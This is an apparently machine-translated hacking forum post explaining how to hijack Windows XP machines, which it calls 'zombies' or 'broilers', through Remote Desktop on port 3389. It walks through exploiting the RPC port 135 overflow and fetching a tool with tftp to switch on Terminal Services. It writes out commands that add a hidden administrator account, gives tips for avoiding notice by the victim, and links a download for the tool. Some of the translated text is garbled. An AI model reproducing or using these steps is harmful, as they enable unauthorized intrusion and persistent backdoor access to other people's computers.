Let's talk about it first. I wrote it six months ago. It was published on "hacker security base.
Windows xp 3389
Windows xp has been released for more than two years. But it always seems to be unbreakable. In the past, there were some windows xp overflow issues, but almost no one succeeded. The Microsoft RPC interface's remote arbitrary code execution vulnerability, which has been a hot topic recently, broke this myth. However, for windows xp, I personally think the security factor is still relatively high. It is recommended for personal use.
Today, I want to talk about the Terminal Services Service of windows xp. The Service uses tcp port 3389. As a result, all the bots that use the Terminal Services Service are used to calling them 3389 chickens. I'm sure everyone has ever played win2k 3389, right? However, I recently went to some forums and many people said that windows xp's Terminal Services are the same as windows 2000. My many experiments have found that windows xp 3389 and windows 2000 3389 are not the same and much worse. Next I will explain in detail windows xp 3389. First, you need to enable windows xp 3389 first to see the windows xp 3389. I found a small tool on the Internet for enabling windows xp3389. With multiple experiments, 100% is successful. The Tool Name is
Xp3389.exe is easy to use. Upload the file directly to the BOT and execute it. Because xp's ipc $ is only the guest permission by default. Using ipc $ to upload files is absolutely incorrect. I have summarized two methods for uploading files:
1. Use tftp to upload files. (Are you familiar with tftp? I have mentioned N times before)
2. upload via ftp
First, I first use the rpc vulnerability on port 135, which is currently a cutting-edge vulnerability, to overflow a windows xp host. For details, see:
OK. Success. After obtaining a system permission, run the xp3389.exe command on tftpto tftp-I ip get xp3389.exe:
OK. Then execute the command directly in the zombie. See:
After the execution is complete, the 3389 service is successfully enabled. (The biggest advantage of this program is that it can be directly logged in after execution without restarting the zombie .)
By the way, there is another problem that I want to log on to xp 3389 with accounts not occupied by the system. That is, the account that is not currently in use must be in the administrators group.
The Guest group is not allowed. I executed two more commands in the broiler:
Net user zihuan ziHUAN/add
Net localgroup administrators zihuan/add
I believe everyone can understand that the user who has set up an administrator permission on the bot is zihuan and the password is ziHUAN.
After the establishment, you can directly log on to the system using the Remote Desktop Connection:
Enter the user name and password you just created to log on to the system:
OK is a perfect xp desktop. Is it really refreshing? But don't be happy first. I said that xp 3389 is different from win2k. There are several differences:
1. After you log on to xp 3389, the account that the host was logged on to will be automatically logged off. That is to say, xp only supports logon by one user. After you log on to the system, the host of the vulnerable host will fall down. :) if the Zombie Master finds that he has fallen down, then you will fall down :)
2. upon login, the host of xp3389 will receive a message. But if you are fast enough ...... Hey.
3. When you log on to xp3389, the remote host sound will be taken to the local device. Don't be afraid. The solution is to leave the remote computer sound of Remote Desktop Connection to the remote host:
The above are some ideas for xp3389. I hope this will be helpful for the hacking of Everbright fans. Thanks, I also found that xp3389.exe can also enable 2003 of windows server 3389. I will not introduce it here.
Xp3389.exe can be used to enable xp terminals.
Upload it to the BOT and run it directly. You do not need to restart.
:
Http://y365.com/zihuan/tools/xp3389.zip